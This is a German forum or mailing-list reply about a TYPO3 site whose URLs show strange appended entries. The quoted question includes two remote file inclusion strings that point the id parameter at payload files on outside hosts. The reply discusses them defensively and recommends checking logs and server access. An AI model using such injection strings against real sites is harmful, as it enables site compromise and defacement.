Hallo
Da'oud al-Sahing schrieb:
> Hallo zusammen!
>
> Bei einer Typo3-Installation werden ind unregelmässigen Abständen die
> generierten URLs um fremde Einträge erweitert. BSP:
> -
> http://www.xxxxxxx.ch/index.php?id=7&L=0index.php?id=41/index.php?id=http://www.oaltouruguai.com.br/Fuploads/bot.txt?
> -
> http://www.xxxxxxx.ch/index.php?id=6&L=1index.php?id=6/index.php?id=http://www.freewebtown.com/sclipicius/evilx?
> -
> [...]
Wo hast du die Links denn entdeckt? In den LOG Dateien deines Servers
oder sind die Seiten modifiziert?
Da ich kürzlich mal mit einer gehackten Joomla Seite zu tun hatte kommen
mir ein paar der in den Links vorkommenden Namen recht bekannt vor.
So lange diese Aufrufe nur in deinen LOG Dateien sind ist da wohl kein
größere Gefahr, da dann offenbar "nur" jemand versucht hat dir ein Code
Injection zu machen. Da ist bei Typo3 im Moment aber wohl kein größeres
Loch bekannt (zumindest mir nicht).
Wenn sich allerdings deine Links auf deiner Seite ändern würde das ja
bedeuten, dass da jemand Zugang auf dein BE hat oder ein Loch im Typo
gefunden hat über der er das ändern kann. Dann würde ich mir Sorgen
machen und mal genau  den Datenverkeht und die Zugriffe auf den Server
beobachten.
Hinter diesen netten *.txt Dateien verstecken sich übrigens meist
irgendwelche Defacment Tools, Massenmailer oder sonst so ein Drreck
irgendwelcher Scriptkiddies.

Bernd

--
nMedien, Schuhmacher & Schuhmacher GbR